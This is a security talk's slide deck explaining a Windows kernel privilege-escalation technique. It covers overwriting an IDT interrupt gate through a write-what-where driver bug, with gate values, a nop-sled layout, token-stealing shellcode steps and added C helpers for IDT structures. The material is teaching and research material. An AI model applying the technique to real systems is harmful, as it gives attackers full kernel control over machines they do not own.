2. About me
• inaz2
• Security engineer & Python programmer
• Working at NTT Communications
• Weblog “momoiro technology”
• http://inaz2.hatenablog.com/
3. Windows kernel exploitation
• Attacks that exploit a vulnerability in kernel land
• Including vulnerabilities in device drivers
• Write-what-where vulnerabilities are widely used
• They let the attacker write an arbitrary value to an arbitrary address
• Execute shellcode to escalate the privileges of the attacking process
• Then launch an administrator command prompt
4. Classic technique: halDispatchTable overwrite
• nt!NtQueryIntervalProfile (undocumented native API)
• Calls [nt!halDispatchTable+4] via nt!KeQueryIntervalProfile
• Overwrite [nt!halDispatchTable+4] with the address of the shellcode, then call NtQueryIntervalProfile from user mode
5. Replace token shellcode
• Copy the token of the System process (PID=4) into the attacking process' EPROCESS
• In the shellcode, replace the 41414141h placeholder with the attacking process' PID
6. It works but …
• It depends on the implementation of nt!NtQueryIntervalProfile
• The kernel implementation may change in the future (i.e. not reliable)
• Is there a more reliable target to overwrite?
8. x86 interrupt handling
• There are hardware interrupts (keyboard etc.) and software interrupts/exceptions (division by zero etc.)
• Software interrupts are triggered by the “int n” instruction
• Interrupt Descriptor Table (IDT)
• Each entry (interrupt gate) stores the address of a handler function (Interrupt Service Routine; ISR)
• ISRs are executed in Ring 0
• They can do everything
9. x86 privilege levels (protection rings)
• 4 privilege levels numbered from 0 to 3
• A higher number means fewer privileges
• Most OSes including Windows use only two rings
• Ring 0 corresponds to kernel mode and Ring 3 to user mode
13. Interrupt Descriptor Table (4/4)
• Overwrite the interrupt gate for interrupt #0
• Gate after the overwrite (debugger view): 000884fc 4141ee00, i.e. handler address 414184fc, DPL=3
14. IDT overwrite technique
• Get the IDT address
• Overwrite the interrupt gate for interrupt #n
• Trigger interrupt #n with the “int n” instruction
• Execute shellcode
16. Find the write-what-where vulnerability
• Write and install a deliberately vulnerable device driver
• It exposes a write-what-where primitive through an IOCTL
17. Get the IDT address (1/2)
• The sidt instruction stores the IDT register (base address and limit) to memory
• Can be used even in Ring 3!
18. Get the IDT address (2/2)
• A function that returns the IDT address
• Structure alignment must be disabled, because sidt stores a packed 6-byte image (16-bit limit followed by the 32-bit base)
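The following C is an added example, not code from the talk, showing why the IDTR structure needs alignment disabled and what is done with the value once it is read: the 6-byte image is decoded, the gate count is derived from the limit, and the address of the 8-byte gate for a given vector (the write-what-where target) is computed. The sample IDTR bytes are constructed for the demonstration; the `sidt` read itself only compiles on a 32-bit x86 GCC/Clang build (in 64-bit mode `sidt` stores a 10-byte image instead), and on CPUs where the OS has enabled UMIP the instruction faults in Ring 3.

```c
#include <stdint.h>
#include <stdio.h>

/* Image written by the 32-bit SIDT instruction: a 16-bit limit immediately
 * followed by a 32-bit linear base. Without pack(1) the compiler would pad
 * `limit` to a 4-byte boundary, sizeof would be 8, and `base` would be read
 * two bytes away from where SIDT actually stored it. */
#pragma pack(push, 1)
typedef struct {
    uint16_t limit;  /* bytes in the IDT minus one; 0x7ff for all 256 gates */
    uint32_t base;   /* linear address of gate #0 */
} idtr32_t;
#pragma pack(pop)

/* Decode a raw 6-byte IDTR image byte by byte (little-endian), so this also
 * works for bytes copied out of a debugger on any host. */
idtr32_t idtr32_from_bytes(const uint8_t b[6])
{
    idtr32_t r;
    r.limit = (uint16_t)(b[0] | (b[1] << 8));
    r.base  = (uint32_t)b[2] | ((uint32_t)b[3] << 8) |
              ((uint32_t)b[4] << 16) | ((uint32_t)b[5] << 24);
    return r;
}

/* Each 32-bit gate is 8 bytes, so the limit tells how many vectors exist. */
unsigned idtr32_gate_count(idtr32_t r)
{
    return ((unsigned)r.limit + 1u) / 8u;
}

/* Address of the gate for `vector`: the address handed to the
 * write-what-where primitive in the IDT overwrite technique. */
uint32_t idt32_gate_address(idtr32_t r, unsigned vector)
{
    return r.base + 8u * vector;
}

/* Constructed sample (not captured from a real machine): limit 0x07ff,
 * base 0x8055f400. */
idtr32_t sample_idtr(void)
{
    static const uint8_t sample[6] = { 0xff, 0x07, 0x00, 0xf4, 0x55, 0x80 };
    return idtr32_from_bytes(sample);
}

/* Read the live IDTR from Ring 3. Returns 0 when not built as 32-bit x86. */
int read_idtr32(idtr32_t *out)
{
#if defined(__i386__) && defined(__GNUC__)
    __asm__ volatile ("sidt %0" : "=m" (*out));
    return 1;
#else
    (void)out;
    return 0;
#endif
}

int main(void)
{
    idtr32_t r = sample_idtr();
    printf("sizeof(idtr32_t) = %u (must be 6)\n", (unsigned)sizeof(idtr32_t));
    printf("IDT base=%08x limit=%04x gates=%u\n",
           (unsigned)r.base, (unsigned)r.limit, idtr32_gate_count(r));
    printf("gate for int 32 lives at %08x\n", (unsigned)idt32_gate_address(r, 32));

    idtr32_t live;
    if (read_idtr32(&live))
        printf("live IDT base=%08x limit=%04x\n", (unsigned)live.base, (unsigned)live.limit);
    else
        puts("sidt demo needs a 32-bit x86 build");
    return 0;
}
```

The base returned by `sidt` is a kernel address, which is exactly the information leak the technique relies on: no kernel symbol or version-specific offset is needed to locate the gate to overwrite.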
19. Write the Interrupt Service Routine (ISR)
• Switch the value of the fs segment register
• 0x3B (user-mode TEB selector) → 0x30 (KPCR), so kernel code that reads through fs works
• Call the shellcode placed right after the ISR
• Return with the iretd instruction instead of ret (the CPU pushed EIP, CS and EFLAGS, plus ESP and SS for the ring change)
20. Allocate memory & put the codes
• Allocate a nop-sled from 0x41410000 to 0x41420000 (only the upper 16 bits of the handler offset are overwritten, so the new handler address is 0x4141xxxx with the original low 16 bits, i.e. somewhere in the sled)
• Put the ISR code + shellcode at 0x41420000
21. Overwrite the interrupt gate
• Write 0x4141ee00 to the upper dword of the interrupt gate for interrupt #32
• 0x4141 = upper 16 bits of the handler address; 0xEE = present, DPL=3, 32-bit interrupt gate (DPL=3 is what allows Ring 3 to issue the int without a #GP)
• Vectors #32-255 are designated for user-defined interrupts (#0-31 are reserved by Intel)
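The C below is an added example, not code from the talk, that encodes and decodes the gate layouts discussed on slides 13 and 21 and on the 64-bit slide. It uses the two dwords shown in the deck (000884fc 4141ee00), a constructed "before" upper dword 0x80548e00 (a typical kernel handler with DPL=0) that is not from the page, and the field layout from the Intel SDM; it checks that the single upper-dword write lands the handler in the 0x41410000-0x41420000 sled and makes the gate reachable from Ring 3, and shows why the 16-byte 64-bit gate needs two writes.

```c
#include <stdint.h>
#include <stdio.h>

/* Fields of an 8-byte 32-bit IDT gate. The layout is fixed by the CPU
 * (Intel SDM vol. 3, IDT descriptors), which is why this target does not
 * move between Windows versions the way halDispatchTable's caller may. */
typedef struct {
    uint32_t offset;    /* linear address of the handler (ISR) */
    uint16_t selector;  /* code segment the ISR runs in; 0x0008 is the Windows kernel CS */
    uint8_t  type;      /* 0xE = 32-bit interrupt gate, 0xF = 32-bit trap gate */
    uint8_t  dpl;       /* highest ring that may reach this gate with `int n` */
    uint8_t  present;
} gate32_t;

/* Encode into the two little-endian dwords as they sit in the IDT:
 * lo = selector:offset[15:0], hi = offset[31:16]:type_attr:reserved(0). */
void gate32_encode(const gate32_t *g, uint32_t *lo, uint32_t *hi)
{
    uint8_t attr = (uint8_t)((g->present ? 0x80 : 0) | ((g->dpl & 3) << 5) | (g->type & 0xF));
    *lo = ((uint32_t)g->selector << 16) | (g->offset & 0xFFFFu);
    *hi = (g->offset & 0xFFFF0000u) | ((uint32_t)attr << 8);
}

gate32_t gate32_decode(uint32_t lo, uint32_t hi)
{
    gate32_t g;
    uint8_t attr = (uint8_t)(hi >> 8);
    g.offset   = (hi & 0xFFFF0000u) | (lo & 0xFFFFu);
    g.selector = (uint16_t)(lo >> 16);
    g.type     = attr & 0xF;
    g.dpl      = (attr >> 5) & 3;
    g.present  = (attr >> 7) & 1;
    return g;
}

/* `int n` issued at privilege level `cpl` only reaches the gate if it is
 * present and DPL >= CPL; otherwise the CPU raises #GP. This is why the deck
 * writes 0xEE (DPL=3) rather than the kernel's usual 0x8E (DPL=0). */
int gate32_reachable_from(const gate32_t *g, unsigned cpl)
{
    return g->present && g->dpl >= cpl;
}

/* The deck's single 4-byte write: only the upper dword changes, so the new
 * handler is what[31:16]:orig_offset[15:0]; the lower dword is untouched. */
gate32_t gate32_after_upper_write(uint32_t orig_lo, uint32_t what)
{
    return gate32_decode(orig_lo, what);
}

int in_sled(uint32_t addr, uint32_t sled_start, uint32_t sled_end)
{
    return addr >= sled_start && addr < sled_end;
}

/* 16-byte 64-bit gate: offset[63:32] lives in the second qword, so the whole
 * gate must be rewritten (two 8-byte writes); covering every possible
 * offset[31:0] with a sled would take 4 GiB, as the deck notes. */
void gate64_encode(uint64_t offset, uint16_t selector, uint8_t ist,
                   uint8_t type, uint8_t dpl, uint64_t *lo, uint64_t *hi)
{
    uint64_t attr = 0x80u | ((dpl & 3u) << 5) | (type & 0xFu);
    *lo = ((offset & 0xFFFF0000u) << 32)   /* offset[31:16] -> bits 63:48 */
        | (attr << 40)                      /* P/DPL/type    -> bits 47:40 */
        | ((uint64_t)(ist & 7u) << 32)      /* IST index     -> bits 34:32 */
        | ((uint64_t)selector << 16)
        | (offset & 0xFFFFu);
    *hi = offset >> 32;                     /* offset[63:32]; upper 32 bits reserved */
}

int main(void)
{
    uint32_t lo, hi;
    /* Dwords from the deck's debugger output */
    gate32_t g = gate32_decode(0x000884fcu, 0x4141ee00u);
    printf("handler=%08x selector=%04x type=%x dpl=%u present=%u\n",
           (unsigned)g.offset, (unsigned)g.selector, (unsigned)g.type,
           (unsigned)g.dpl, (unsigned)g.present);

    /* Constructed original gate: kernel handler 0x805484fc, attr 0x8E (DPL 0) */
    gate32_t before = gate32_decode(0x000884fcu, 0x80548e00u);
    gate32_t after  = gate32_after_upper_write(0x000884fcu, 0x4141ee00u);
    printf("int 32 from ring 3 allowed: before=%d after=%d\n",
           gate32_reachable_from(&before, 3), gate32_reachable_from(&after, 3));
    printf("handler %08x inside sled: %d\n", (unsigned)after.offset,
           in_sled(after.offset, 0x41410000u, 0x41420000u));

    gate32_encode(&g, &lo, &hi);
    printf("re-encoded gate: %08x %08x\n", (unsigned)lo, (unsigned)hi);
    return 0;
}
```

Because the low 16 bits of the offset survive the write, the handler can land anywhere in 0x41410000-0x4141ffff; that is the entire reason the 64 KiB sled in front of the ISR exists.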
22. Trigger the software interrupt
• Execute “int 32”
• The shellcode is executed via the ISR, in Ring 0
• Then launch cmd.exe
24. What about 64 bit Windows?
• The size of an interrupt gate increases to 16 bytes
• Since a 0x100000000-byte nop-sled is impractical, the entire interrupt gate must be overwritten (i.e. two writes)
• However, my VirtualBox VM hangs when the interrupt is triggered (PatchGuard??)
25. Comparison with halDispatchTable overwrite
• Pros
• Reliable against all versions of x86-based Windows
• Easy to determine the address to be overwritten
• Cons
• Need to prepare the ISR code
• Need to allocate a nop-sled
• Not confirmed on 64-bit
26. Recap
• The IDT overwrite technique is reliable against all versions of x86-based Windows
• Independent of kernel implementation changes
• We can get the IDT address even in Ring 3
• There’s more than one way to do it
27. References
• Trying privilege escalation from a device driver vulnerability on Windows (Windowsでデバイスドライバの脆弱性からの権限昇格をやってみる) - momoiro technology
• http://inaz2.hatenablog.com/entry/2015/09/15/121926
• Project Zero: One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation
• http://googleprojectzero.blogspot.jp/2015/08/one-font-vulnerability-to-rule-them-all_21.html
• Interrupt Service Routines - OSDev Wiki
• http://wiki.osdev.org/Interrupt_Service_Routines
• SIMPLE IS BETTER: Kernel Information Leak with Unprivileged Instructions (SIDT, SGDT) on x86 - WHY?
• http://hypervsir.blogspot.jp/2014/10/kernel-information-leak-with.html